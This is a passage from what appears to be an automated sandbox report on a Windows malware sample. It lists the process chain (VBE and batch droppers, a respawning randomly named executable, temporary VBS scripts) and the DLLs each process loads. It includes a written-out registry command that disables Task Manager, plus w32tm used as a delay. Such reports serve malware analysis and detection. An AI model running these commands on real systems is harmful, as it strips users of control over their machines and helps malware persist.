            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs"
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portcontainerRef\SurrogateContainerAgent.exe "C:\portcontainerRef\SurrogateContainerAgent.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe" Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: version.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: wldp.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: profapi.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: amsi.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: userenv.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: propsys.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: edputil.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: netutils.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: slc.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: sppc.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: version.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: profapi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: amsi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: propsys.dllJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeSection loaded: edputil.dllJump to behavior
